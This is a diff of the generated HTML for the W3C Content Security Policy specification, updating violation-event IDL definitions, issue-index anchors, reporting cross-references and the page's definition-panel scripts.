+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString④①"><span class="kt">DOMString</span></a>      <a class="nv" data-readonly="" data-type="DOMString" href="#dom-securitypolicyviolationevent-effectivedirective"><code>effectiveDirective</code></a>;
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString⑤①"><span class="kt">DOMString</span></a>      <a class="nv idl-code" data-link-type="attribute" data-readonly="" data-type="DOMString" href="#dom-securitypolicyviolationevent-violateddirective" id="ref-for-dom-securitypolicyviolationevent-violateddirective①">violatedDirective</a>; // historical alias of effectiveDirective
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString⑥①"><span class="kt">DOMString</span></a>      <a class="nv" data-readonly="" data-type="DOMString" href="#dom-securitypolicyviolationevent-originalpolicy"><code>originalPolicy</code></a>;
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString⑨①"><span class="kt">USVString</span></a>      <a class="nv" data-readonly="" data-type="USVString" href="#dom-securitypolicyviolationevent-sourcefile"><code>sourceFile</code></a>;
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString⑦①"><span class="kt">DOMString</span></a>      <a class="nv" data-readonly="" data-type="DOMString" href="#dom-securitypolicyviolationevent-sample"><code>sample</code></a>;
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n" data-link-type="idl-name" href="#enumdef-securitypolicyviolationeventdisposition" id="ref-for-enumdef-securitypolicyviolationeventdisposition①①">SecurityPolicyViolationEventDisposition</a>      <a class="nv" data-readonly="" data-type="SecurityPolicyViolationEventDisposition" href="#dom-securitypolicyviolationevent-disposition"><code>disposition</code></a>;
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-short" id="ref-for-idl-unsigned-short①①"><span class="kt">unsigned</span> <span class="kt">short</span></a> <a class="nv" data-readonly="" data-type="unsigned short" href="#dom-securitypolicyviolationevent-statuscode"><code>statusCode</code></a>;
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long②①"><span class="kt">unsigned</span> <span class="kt">long</span></a>  <a class="nv" data-readonly="" data-type="unsigned long" href="#dom-securitypolicyviolationevent-lineno"><code>lineno</code></a>;
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long③①"><span class="kt">unsigned</span> <span class="kt">long</span></a>  <a class="nv idl-code" data-link-type="attribute" data-readonly="" data-type="unsigned long" href="#dom-securitypolicyviolationevent-linenumber" id="ref-for-dom-securitypolicyviolationevent-linenumber①">lineNumber</a>; // historical alias of lineno
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long④①"><span class="kt">unsigned</span> <span class="kt">long</span></a>  <a class="nv" data-readonly="" data-type="unsigned long" href="#dom-securitypolicyviolationevent-colno"><code>colno</code></a>;
+    <span class="kt">readonly</span>    <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long⑤①"><span class="kt">unsigned</span> <span class="kt">long</span></a>  <a class="nv idl-code" data-link-type="attribute" data-readonly="" data-type="unsigned long" href="#dom-securitypolicyviolationevent-columnnumber" id="ref-for-dom-securitypolicyviolationevent-columnnumber①">columnNumber</a>; // historical alias of colno
+};
+
+<span class="kt">dictionary</span> <a class="nv" href="#dictdef-securitypolicyviolationeventinit"><code>SecurityPolicyViolationEventInit</code></a> : <a class="n" data-link-type="idl-name" href="https://dom.spec.whatwg.org/#dictdef-eventinit" id="ref-for-dictdef-eventinit①">EventInit</a> {
+    <span class="kt">required</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString①⓪①"><span class="kt">USVString</span></a>      <a class="nv" data-type="USVString      " href="#dom-securitypolicyviolationeventinit-documenturl"><code>documentURL</code></a>;
+             <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString①①①"><span class="kt">USVString</span></a>      <a class="nv" data-default="&quot;&quot;" data-type="USVString      " href="#dom-securitypolicyviolationeventinit-referrer"><code>referrer</code></a> = "";
+             <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString①②①"><span class="kt">USVString</span></a>      <a class="nv" data-default="&quot;&quot;" data-type="USVString      " href="#dom-securitypolicyviolationeventinit-blockedurl"><code>blockedURL</code></a> = "";
+    <span class="kt">required</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString⑧①"><span class="kt">DOMString</span></a>      <a class="nv" data-type="DOMString      " href="#dom-securitypolicyviolationeventinit-effectivedirective"><code>effectiveDirective</code></a>;
+    <span class="kt">required</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString⑨①"><span class="kt">DOMString</span></a>      <a class="nv" data-type="DOMString      " href="#dom-securitypolicyviolationeventinit-originalpolicy"><code>originalPolicy</code></a>;
+             <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString①③①"><span class="kt">USVString</span></a>      <a class="nv" data-default="&quot;&quot;" data-type="USVString      " href="#dom-securitypolicyviolationeventinit-sourcefile"><code>sourceFile</code></a> = "";
+             <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString①⓪①"><span class="kt">DOMString</span></a>      <a class="nv" data-default="&quot;&quot;" data-type="DOMString      " href="#dom-securitypolicyviolationeventinit-sample"><code>sample</code></a> = "";
+    <span class="kt">required</span> <a class="n" data-link-type="idl-name" href="#enumdef-securitypolicyviolationeventdisposition" id="ref-for-enumdef-securitypolicyviolationeventdisposition②①">SecurityPolicyViolationEventDisposition</a> <a class="nv" data-type="SecurityPolicyViolationEventDisposition " href="#dom-securitypolicyviolationeventinit-disposition"><code>disposition</code></a>;
+    <span class="kt">required</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-short" id="ref-for-idl-unsigned-short②①"><span class="kt">unsigned</span> <span class="kt">short</span></a> <a class="nv" data-type="unsigned short " href="#dom-securitypolicyviolationeventinit-statuscode"><code>statusCode</code></a>;
+             <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long⑥①"><span class="kt">unsigned</span> <span class="kt">long</span></a>  <a class="nv" data-default="0" data-type="unsigned long  " href="#dom-securitypolicyviolationeventinit-lineno"><code>lineno</code></a> = 0;
+             <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long⑦①"><span class="kt">unsigned</span> <span class="kt">long</span></a>  <a class="nv" data-default="0" data-type="unsigned long  " href="#dom-securitypolicyviolationeventinit-colno"><code>colno</code></a> = 0;
 };
 
 </pre>
   <h2 class="no-num no-ref heading settled" id="issues-index"><span class="content">Issues Index</span><a class="self-link" href="#issues-index"></a></h2>
   <div style="counter-reset:issue">
    <div class="issue"> Is this kind of thing specified anywhere? I didn’t see anything
-  that looked useful in <a data-link-type="biblio" href="#biblio-ecma262">[ECMA262]</a>.<a href="#issue-ee968c9a"> ↵ </a></div>
+  that looked useful in <a data-link-type="biblio" href="#biblio-ecma262">[ECMA262]</a>.<a href="#issue-c404edb5"> ↵ </a></div>
    <div class="issue"> How, exactly, do we get the status code? We don’t actually store it
-  anywhere.<a href="#issue-d43ce829"> ↵ </a></div>
+  anywhere.<a href="#issue-99576800"> ↵ </a></div>
    <div class="issue"> Stylesheet loading is not yet integrated with
-  Fetch in WHATWG’s HTML. <a href="https://github.com/whatwg/html/issues/968">&lt;https://github.com/whatwg/html/issues/968></a><a href="#issue-5599665e"> ↵ </a></div>
+  Fetch in WHATWG’s HTML. <a href="https://github.com/whatwg/html/issues/968">&lt;https://github.com/whatwg/html/issues/968></a><a href="#issue-25da4fba"> ↵ </a></div>
    <div class="issue"> <code class="idl"><a data-link-type="idl" href="https://tc39.github.io/ecma262#sec-hostensurecancompilestrings">HostEnsureCanCompileStrings()</a></code> does not include the string which is
   going to be compiled as a parameter. We’ll also need to update HTML to pipe that value through
-  to CSP. <a href="https://github.com/tc39/ecma262/issues/938">&lt;https://github.com/tc39/ecma262/issues/938></a><a href="#issue-d5a07bef"> ↵ </a></div>
+  to CSP. <a href="https://github.com/tc39/ecma262/issues/938">&lt;https://github.com/tc39/ecma262/issues/938></a><a href="#issue-910d1dca"> ↵ </a></div>
    <div class="issue"> This needs to be better explained. <a href="https://github.com/w3c/webappsec-csp/issues/212">&lt;https://github.com/w3c/webappsec-csp/issues/212></a><a href="#issue-ba1a0a35"> ↵ </a></div>
    <div class="issue"> Do something interesting to the execution context in order to lock down
   interesting CSSOM algorithms. I don’t think CSSOM gives us any hooks here, so
-  let’s work with them to put something reasonable together.<a href="#issue-6fa220c3"> ↵ </a></div>
-   <div class="issue"> Spell this out in more detail as part of defining <code>X-Frame-Options</code> integration with the <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsing-the-web.html#process-a-navigate-response">process a navigate response</a> algorithm. <a href="https://github.com/whatwg/html/issues/1230">&lt;https://github.com/whatwg/html/issues/1230></a><a href="#issue-c6a38617"> ↵ </a></div>
+  let’s work with them to put something reasonable together.<a href="#issue-eba1ebc1"> ↵ </a></div>
+   <div class="issue"> Spell this out in more detail as part of defining <code>X-Frame-Options</code> integration with the <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsing-the-web.html#process-a-navigate-response">process a navigate response</a> algorithm. <a href="https://github.com/whatwg/html/issues/1230">&lt;https://github.com/whatwg/html/issues/1230></a><a href="#issue-db2876b7"> ↵ </a></div>
    <div class="issue"> We need some sort of hook in HTML to record this error if we’re
-  planning on using it here. <a href="https://github.com/whatwg/html/issues/3257">&lt;https://github.com/whatwg/html/issues/3257></a><a href="#issue-820579ab"> ↵ </a></div>
+  planning on using it here. <a href="https://github.com/whatwg/html/issues/3257">&lt;https://github.com/whatwg/html/issues/3257></a><a href="#issue-e2d81ee7"> ↵ </a></div>
    <div class="issue"> This processing is meant to mitigate the risk
   of dangling markup attacks that steal the nonce from an existing element
   in order to load injected script. It is fairly expensive, however, as it
@@ -8259,10 +6513,10 @@ rest of Google’s CSP Cabal.</p>
   determine whether the script should execute. Here, we try to minimize the
   impact by doing this check only for <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/scripting.html#script">script</a></code> elements when a nonce is
   present, but we should probably consider this algorithm as "at risk" until
-  we know its impact. <a href="https://github.com/w3c/webappsec-csp/issues/98">&lt;https://github.com/w3c/webappsec-csp/issues/98></a><a href="#issue-4592ac7e"> ↵ </a></div>
+  we know its impact. <a href="https://github.com/w3c/webappsec-csp/issues/98">&lt;https://github.com/w3c/webappsec-csp/issues/98></a><a href="#issue-c41e2850"> ↵ </a></div>
    <div class="issue"> Currently the HTML spec’s parsing algorithm removes this information
   before the <a href="#is-element-nonceable">§6.6.3.1 Is element nonceable?</a> algorithm can be run which makes it
-  impossible to actually detect duplicate attributes. <a href="https://github.com/whatwg/html/issues/3257">&lt;https://github.com/whatwg/html/issues/3257></a><a href="#issue-74cb0fbd"> ↵ </a></div>
+  impossible to actually detect duplicate attributes. <a href="https://github.com/whatwg/html/issues/3257">&lt;https://github.com/whatwg/html/issues/3257></a><a href="#issue-a39840e8"> ↵ </a></div>
   </div>
   <aside class="dfn-panel" data-for="content-security-policy">
    <b><a href="#content-security-policy">#content-security-policy</a></b><b>Referenced in:</b>
@@ -8528,7 +6782,7 @@ rest of Google’s CSP Cabal.</p>
     <li><a href="#ref-for-serialized-csp⑦">5.2. 
     Obtain the deprecated serialization of violation </a>
     <li><a href="#ref-for-serialized-csp⑧">5.3. 
-    Report a violation </a>
+    Report a violation </a> <a href="#ref-for-serialized-csp⑨">(2)</a>
    </ul>
   </aside>
   <aside class="dfn-panel" data-for="grammardef-serialized-policy">
@@ -9286,7 +7540,7 @@ rest of Google’s CSP Cabal.</p>
     <li><a href="#ref-for-violation-url">5.2. 
     Obtain the deprecated serialization of violation </a>
     <li><a href="#ref-for-violation-url①">5.3. 
-    Report a violation </a> <a href="#ref-for-violation-url②">(2)</a> <a href="#ref-for-violation-url③">(3)</a>
+    Report a violation </a> <a href="#ref-for-violation-url②">(2)</a> <a href="#ref-for-violation-url③">(3)</a> <a href="#ref-for-violation-url④">(4)</a>
    </ul>
   </aside>
   <aside class="dfn-panel" data-for="violation-status">
@@ -9297,7 +7551,7 @@ rest of Google’s CSP Cabal.</p>
     <li><a href="#ref-for-violation-status①">5.2. 
     Obtain the deprecated serialization of violation </a>
     <li><a href="#ref-for-violation-status②">5.3. 
-    Report a violation </a>
+    Report a violation </a> <a href="#ref-for-violation-status③">(2)</a>
    </ul>
   </aside>
   <aside class="dfn-panel" data-for="violation-resource">
@@ -9320,8 +7574,8 @@ rest of Google’s CSP Cabal.</p>
     <li><a href="#ref-for-violation-resource⑧">5.2. 
     Obtain the deprecated serialization of violation </a>
     <li><a href="#ref-for-violation-resource⑨">5.3. 
-    Report a violation </a>
-    <li><a href="#ref-for-violation-resource①⓪">6.2.1.1. 
+    Report a violation </a> <a href="#ref-for-violation-resource①⓪">(2)</a>
+    <li><a href="#ref-for-violation-resource①①">6.2.1.1. 
     Is base allowed for document? </a>
    </ul>
   </aside>
@@ -9333,7 +7587,7 @@ rest of Google’s CSP Cabal.</p>
     <li><a href="#ref-for-violation-referrer①">5.2. 
     Obtain the deprecated serialization of violation </a>
     <li><a href="#ref-for-violation-referrer②">5.3. 
-    Report a violation </a>
+    Report a violation </a> <a href="#ref-for-violation-referrer③">(2)</a>
    </ul>
   </aside>
   <aside class="dfn-panel" data-for="violation-policy">
@@ -9344,14 +7598,14 @@ rest of Google’s CSP Cabal.</p>
     <li><a href="#ref-for-violation-policy①">5.2. 
     Obtain the deprecated serialization of violation </a> <a href="#ref-for-violation-policy②">(2)</a>
     <li><a href="#ref-for-violation-policy③">5.3. 
-    Report a violation </a> <a href="#ref-for-violation-policy④">(2)</a> <a href="#ref-for-violation-policy⑤">(3)</a> <a href="#ref-for-violation-policy⑥">(4)</a> <a href="#ref-for-violation-policy⑦">(5)</a> <a href="#ref-for-violation-policy⑧">(6)</a>
+    Report a violation </a> <a href="#ref-for-violation-policy④">(2)</a> <a href="#ref-for-violation-policy⑤">(3)</a> <a href="#ref-for-violation-policy⑥">(4)</a> <a href="#ref-for-violation-policy⑦">(5)</a> <a href="#ref-for-violation-policy⑧">(6)</a> <a href="#ref-for-violation-policy⑨">(7)</a>
    </ul>
   </aside>
   <aside class="dfn-panel" data-for="violation-disposition">
    <b><a href="#violation-disposition">#violation-disposition</a></b><b>Referenced in:</b>
    <ul>
     <li><a href="#ref-for-violation-disposition">5.3. 
-    Report a violation </a>
+    Report a violation </a> <a href="#ref-for-violation-disposition①">(2)</a>
    </ul>
   </aside>
   <aside class="dfn-panel" data-for="violation-effective-directive">
@@ -9362,7 +7616,7 @@ rest of Google’s CSP Cabal.</p>
     <li><a href="#ref-for-violation-effective-directive①">5.2. 
     Obtain the deprecated serialization of violation </a>
     <li><a href="#ref-for-violation-effective-directive②">5.3. 
-    Report a violation </a>
+    Report a violation </a> <a href="#ref-for-violation-effective-directive③">(2)</a>
    </ul>
   </aside>
   <aside class="dfn-panel" data-for="violation-source-file">
@@ -9373,7 +7627,7 @@ rest of Google’s CSP Cabal.</p>
     <li><a href="#ref-for-violation-source-file②">5.2. 
     Obtain the deprecated serialization of violation </a> <a href="#ref-for-violation-source-file③">(2)</a>
     <li><a href="#ref-for-violation-source-file④">5.3. 
-    Report a violation </a> <a href="#ref-for-violation-source-file⑤">(2)</a>
+    Report a violation </a> <a href="#ref-for-violation-source-file⑤">(2)</a> <a href="#ref-for-violation-source-file⑥">(3)</a> <a href="#ref-for-violation-source-file⑦">(4)</a> <a href="#ref-for-violation-source-file⑧">(5)</a> <a href="#ref-for-violation-source-file⑨">(6)</a>
    </ul>
   </aside>
   <aside class="dfn-panel" data-for="violation-line-number">
@@ -9384,7 +7638,7 @@ rest of Google’s CSP Cabal.</p>
     <li><a href="#ref-for-violation-line-number①">5.2. 
     Obtain the deprecated serialization of violation </a> <a href="#ref-for-violation-line-number②">(2)</a>
     <li><a href="#ref-for-violation-line-number③">5.3. 
-    Report a violation </a>
+    Report a violation </a> <a href="#ref-for-violation-line-number④">(2)</a>
    </ul>
   </aside>
   <aside class="dfn-panel" data-for="violation-column-number">
@@ -9395,7 +7649,7 @@ rest of Google’s CSP Cabal.</p>
     <li><a href="#ref-for-violation-column-number①">5.2. 
     Obtain the deprecated serialization of violation </a> <a href="#ref-for-violation-column-number②">(2)</a>
     <li><a href="#ref-for-violation-column-number③">5.3. 
-    Report a violation </a>
+    Report a violation </a> <a href="#ref-for-violation-column-number④">(2)</a>
    </ul>
   </aside>
   <aside class="dfn-panel" data-for="violation-element">
@@ -9419,7 +7673,7 @@ rest of Google’s CSP Cabal.</p>
     <li><a href="#ref-for-violation-sample④">5.2. 
     Obtain the deprecated serialization of violation </a>
     <li><a href="#ref-for-violation-sample⑤">5.3. 
-    Report a violation </a>
+    Report a violation </a> <a href="#ref-for-violation-sample⑥">(2)</a>
    </ul>
   </aside>
   <aside class="dfn-panel" data-for="header-content-security-policy">
@@ -9525,17 +7779,104 @@ rest of Google’s CSP Cabal.</p>
     Initialize a global object’s CSP list </a>
    </ul>
   </aside>
-  <aside class="dfn-panel" data-for="violation-report">
-   <b><a href="#violation-report">#violation-report</a></b><b>Referenced in:</b>
+  <aside class="dfn-panel" data-for="csp-violation-report">
+   <b><a href="#csp-violation-report">#csp-violation-report</a></b><b>Referenced in:</b>
    <ul>
-    <li><a href="#ref-for-violation-report">6.4.1. report-uri</a>
+    <li><a href="#ref-for-csp-violation-report">5. 
+    Reporting </a> <a href="#ref-for-csp-violation-report①">(2)</a>
+   </ul>
+  </aside>
+  <aside class="dfn-panel" data-for="cspviolationreportbody">
+   <b><a href="#cspviolationreportbody">#cspviolationreportbody</a></b><b>Referenced in:</b>
+   <ul>
+    <li><a href="#ref-for-cspviolationreportbody">5.3. 
+    Report a violation </a>
+   </ul>
+  </aside>
+  <aside class="dfn-panel" data-for="dom-cspviolationreportbody-documenturl">
+   <b><a href="#dom-cspviolationreportbody-documenturl">#dom-cspviolationreportbody-documenturl</a></b><b>Referenced in:</b>
+   <ul>
+    <li><a href="#ref-for-dom-cspviolationreportbody-documenturl">5.3. 
+    Report a violation </a>
+   </ul>
+  </aside>
+  <aside class="dfn-panel" data-for="dom-cspviolationreportbody-referrer">
+   <b><a href="#dom-cspviolationreportbody-referrer">#dom-cspviolationreportbody-referrer</a></b><b>Referenced in:</b>
+   <ul>
+    <li><a href="#ref-for-dom-cspviolationreportbody-referrer">5.3. 
+    Report a violation </a>
+   </ul>
+  </aside>
+  <aside class="dfn-panel" data-for="dom-cspviolationreportbody-blockedurl">
+   <b><a href="#dom-cspviolationreportbody-blockedurl">#dom-cspviolationreportbody-blockedurl</a></b><b>Referenced in:</b>
+   <ul>
+    <li><a href="#ref-for-dom-cspviolationreportbody-blockedurl">5.3. 
+    Report a violation </a>
+   </ul>
+  </aside>
+  <aside class="dfn-panel" data-for="dom-cspviolationreportbody-effectivedirective">
+   <b><a href="#dom-cspviolationreportbody-effectivedirective">#dom-cspviolationreportbody-effectivedirective</a></b><b>Referenced in:</b>
+   <ul>
+    <li><a href="#ref-for-dom-cspviolationreportbody-effectivedirective">5.3. 
+    Report a violation </a>
+   </ul>
+  </aside>
+  <aside class="dfn-panel" data-for="dom-cspviolationreportbody-originalpolicy">
+   <b><a href="#dom-cspviolationreportbody-originalpolicy">#dom-cspviolationreportbody-originalpolicy</a></b><b>Referenced in:</b>
+   <ul>
+    <li><a href="#ref-for-dom-cspviolationreportbody-originalpolicy">5.3. 
+    Report a violation </a>
+   </ul>
+  </aside>
+  <aside class="dfn-panel" data-for="dom-cspviolationreportbody-sourcefile">
+   <b><a href="#dom-cspviolationreportbody-sourcefile">#dom-cspviolationreportbody-sourcefile</a></b><b>Referenced in:</b>
+   <ul>
+    <li><a href="#ref-for-dom-cspviolationreportbody-sourcefile">5.3. 
+    Report a violation </a>
+   </ul>
+  </aside>
+  <aside class="dfn-panel" data-for="dom-cspviolationreportbody-sample">
+   <b><a href="#dom-cspviolationreportbody-sample">#dom-cspviolationreportbody-sample</a></b><b>Referenced in:</b>
+   <ul>
+    <li><a href="#ref-for-dom-cspviolationreportbody-sample">5.3. 
+    Report a violation </a>
+   </ul>
+  </aside>
+  <aside class="dfn-panel" data-for="dom-cspviolationreportbody-disposition">
+   <b><a href="#dom-cspviolationreportbody-disposition">#dom-cspviolationreportbody-disposition</a></b><b>Referenced in:</b>
+   <ul>
+    <li><a href="#ref-for-dom-cspviolationreportbody-disposition">5.3. 
+    Report a violation </a>
+   </ul>
+  </aside>
+  <aside class="dfn-panel" data-for="dom-cspviolationreportbody-statuscode">
+   <b><a href="#dom-cspviolationreportbody-statuscode">#dom-cspviolationreportbody-statuscode</a></b><b>Referenced in:</b>
+   <ul>
+    <li><a href="#ref-for-dom-cspviolationreportbody-statuscode">5.3. 
+    Report a violation </a>
+   </ul>
+  </aside>
+  <aside class="dfn-panel" data-for="dom-cspviolationreportbody-linenumber">
+   <b><a href="#dom-cspviolationreportbody-linenumber">#dom-cspviolationreportbody-linenumber</a></b><b>Referenced in:</b>
+   <ul>
+    <li><a href="#ref-for-dom-cspviolationreportbody-linenumber">5.3. 
+    Report a violation </a>
+   </ul>
+  </aside>
+  <aside class="dfn-panel" data-for="dom-cspviolationreportbody-columnnumber">
+   <b><a href="#dom-cspviolationreportbody-columnnumber">#dom-cspviolationreportbody-columnnumber</a></b><b>Referenced in:</b>
+   <ul>
+    <li><a href="#ref-for-dom-cspviolationreportbody-columnnumber">5.3. 
+    Report a violation </a>
    </ul>
   </aside>
   <aside class="dfn-panel" data-for="enumdef-securitypolicyviolationeventdisposition">
    <b><a href="#enumdef-securitypolicyviolationeventdisposition">#enumdef-securitypolicyviolationeventdisposition</a></b><b>Referenced in:</b>
    <ul>
-    <li><a href="#ref-for-enumdef-securitypolicyviolationeventdisposition">5.1. 
-    Violation DOM Events </a> <a href="#ref-for-enumdef-securitypolicyviolationeventdisposition①">(2)</a>
+    <li><a href="#ref-for-enumdef-securitypolicyviolationeventdisposition">5. 
+    Reporting </a>
+    <li><a href="#ref-for-enumdef-securitypolicyviolationeventdisposition①">5.1. 
+    Violation DOM Events </a> <a href="#ref-for-enumdef-securitypolicyviolationeventdisposition②">(2)</a>
    </ul>
   </aside>
   <aside class="dfn-panel" data-for="securitypolicyviolationevent">
@@ -10017,143 +8358,60 @@ rest of Google’s CSP Cabal.</p>
     Get the effective directive for inline checks </a>
    </ul>
   </aside>
-<script>/* script-var-click-highlighting */
-
-    document.addEventListener("click", e=>{
-        if(e.target.nodeName == "VAR") {
-            highlightSameAlgoVars(e.target);
-        }
-    });
-    {
-        const indexCounts = new Map();
-        const indexNames = new Map();
-        function highlightSameAlgoVars(v) {
-            // Find the algorithm container.
-            let algoContainer = null;
-            let searchEl = v;
-            while(algoContainer == null && searchEl != document.body) {
-                searchEl = searchEl.parentNode;
-                if(searchEl.hasAttribute("data-algorithm")) {
-                    algoContainer = searchEl;
-                }
-            }
-
-            // Not highlighting document-global vars,
-            // too likely to be unrelated.
-            if(algoContainer == null) return;
-
-            const algoName = algoContainer.getAttribute("data-algorithm");
-            const varName = getVarName(v);
-            const addClass = !v.classList.contains("selected");
-            let highlightClass = null;
-            if(addClass) {
-                const index = chooseHighlightIndex(algoName, varName);
-                indexCounts.get(algoName)[index] += 1;
-                indexNames.set(algoName+"///"+varName, index);
-                highlightClass = nameFromIndex(index);
-            } else {
-                const index = previousHighlightIndex(algoName, varName);
-                indexCounts.get(algoName)[index] -= 1;
-                highlightClass = nameFromIndex(index);
-            }
-
-            // Find all same-name vars, and toggle their class appropriately.
-            for(const el of algoContainer.querySelectorAll("var")) {
-                if(getVarName(el) == varName) {
-                    el.classList.toggle("selected", addClass);
-                    el.classList.toggle(highlightClass, addClass);
-                }
-            }
-        }
-        function getVarName(el) {
-            return el.textContent.replace(/(\s| )+/, " ").trim();
-        }
-        function chooseHighlightIndex(algoName, varName) {
-            let indexes = null;
-            if(indexCounts.has(algoName)) {
-                indexes = indexCounts.get(algoName);
-            } else {
-                // 7 classes right now
-                indexes = [0,0,0,0,0,0,0];
-                indexCounts.set(algoName, indexes);
-            }
-
-            // If the element was recently unclicked,
-            // *and* that color is still unclaimed,
-            // give it back the same color.
-            const lastIndex = previousHighlightIndex(algoName, varName);
-            if(indexes[lastIndex] === 0) return lastIndex;
-
-            // Find the earliest index with the lowest count.
-            const minCount = Math.min.apply(null, indexes);
-            let index = null;
-            for(var i = 0; i < indexes.length; i++) {
-                if(indexes[i] == minCount) {
-                    return i;
-                }
-            }
-        }
-        function previousHighlightIndex(algoName, varName) {
-            return indexNames.get(algoName+"///"+varName);
-        }
-        function nameFromIndex(index) {
-            return "selected" + index;
-        }
-    }
-    </script>
 <script>/* script-dfn-panel */
 
-document.body.addEventListener("click", function(e) {
-    var queryAll = function(sel) { return [].slice.call(document.querySelectorAll(sel)); }
-    // Find the dfn element or panel, if any, that was clicked on.
-    var el = e.target;
-    var target;
-    var hitALink = false;
-    while(el.parentElement) {
-        if(el.tagName == "A") {
-            // Clicking on a link in a <dfn> shouldn't summon the panel
-            hitALink = true;
-        }
-        if(el.classList.contains("dfn-paneled")) {
-            target = "dfn";
-            break;
-        }
-        if(el.classList.contains("dfn-panel")) {
-            target = "dfn-panel";
-            break;
-        }
-        el = el.parentElement;
-    }
-    if(target != "dfn-panel") {
-        // Turn off any currently "on" or "activated" panels.
-        queryAll(".dfn-panel.on, .dfn-panel.activated").forEach(function(el){
-            el.classList.remove("on");
-            el.classList.remove("activated");
-        });
-    }
-    if(target == "dfn" && !hitALink) {
-        // open the panel
-        var dfnPanel = document.querySelector(".dfn-panel[data-for='" + el.id + "']");
-        if(dfnPanel) {
-            dfnPanel.classList.add("on");
-            var rect = el.getBoundingClientRect();
-            dfnPanel.style.left = window.scrollX + rect.right + 5 + "px";
-            dfnPanel.style.top = window.scrollY + rect.top + "px";
-            var panelRect = dfnPanel.getBoundingClientRect();
-            var panelWidth = panelRect.right - panelRect.left;
-            if(panelRect.right > document.body.scrollWidth && (rect.left - (panelWidth + 5)) > 0) {
-                // Reposition, because the panel is overflowing
-                dfnPanel.style.left = window.scrollX + rect.left - (panelWidth + 5) + "px";
+        document.body.addEventListener("click", function(e) {
+            var queryAll = function(sel) { return [].slice.call(document.querySelectorAll(sel)); }
+            // Find the dfn element or panel, if any, that was clicked on.
+            var el = e.target;
+            var target;
+            var hitALink = false;
+            while(el.parentElement) {
+                if(el.tagName == "A") {
+                    // Clicking on a link in a <dfn> shouldn't summon the panel
+                    hitALink = true;
+                }
+                if(el.classList.contains("dfn-paneled")) {
+                    target = "dfn";
+                    break;
+                }
+                if(el.classList.contains("dfn-panel")) {
+                    target = "dfn-panel";
+                    break;
+                }
+                el = el.parentElement;
             }
-        } else {
-            console.log("Couldn't find .dfn-panel[data-for='" + el.id + "']");
-        }
-    } else if(target == "dfn-panel") {
-        // Switch it to "activated" state, which pins it.
-        el.classList.add("activated");
-        el.style.left = null;
-        el.style.top = null;
-    }
+            if(target != "dfn-panel") {
+                // Turn off any currently "on" or "activated" panels.
+                queryAll(".dfn-panel.on, .dfn-panel.activated").forEach(function(el){
+                    el.classList.remove("on");
+                    el.classList.remove("activated");
+                });
+            }
+            if(target == "dfn" && !hitALink) {
+                // open the panel
+                var dfnPanel = document.querySelector(".dfn-panel[data-for='" + el.id + "']");
+                if(dfnPanel) {
+                    console.log(dfnPanel);
+                    dfnPanel.classList.add("on");
+                    var rect = el.getBoundingClientRect();
+                    dfnPanel.style.left = window.scrollX + rect.right + 5 + "px";
+                    dfnPanel.style.top = window.scrollY + rect.top + "px";
+                    var panelRect = dfnPanel.getBoundingClientRect();
+                    var panelWidth = panelRect.right - panelRect.left;
+                    if(panelRect.right > document.body.scrollWidth && (rect.left - (panelWidth + 5)) > 0) {
+                        // Reposition, because the panel is overflowing
+                        dfnPanel.style.left = window.scrollX + rect.left - (panelWidth + 5) + "px";
+                    }
+                } else {
+                    console.log("Couldn't find .dfn-panel[data-for='" + el.id + "']");
+                }
+            } else if(target == "dfn-panel") {
+                // Switch it to "activated" state, which pins it.
+                el.classList.add("activated");
+                el.style.left = null;
+                el.style.top = null;
+            }
 
-});
-</script>
+        });
+        </script>

--- a/index.html
+++ b/index.html
@@ -1178,7 +1178,7 @@ Possible extra rowspan handling
 </style>
   <meta content="Bikeshed version fbf1456a756299b3ff6d248d0857ec87f2e68cd7" name="generator">
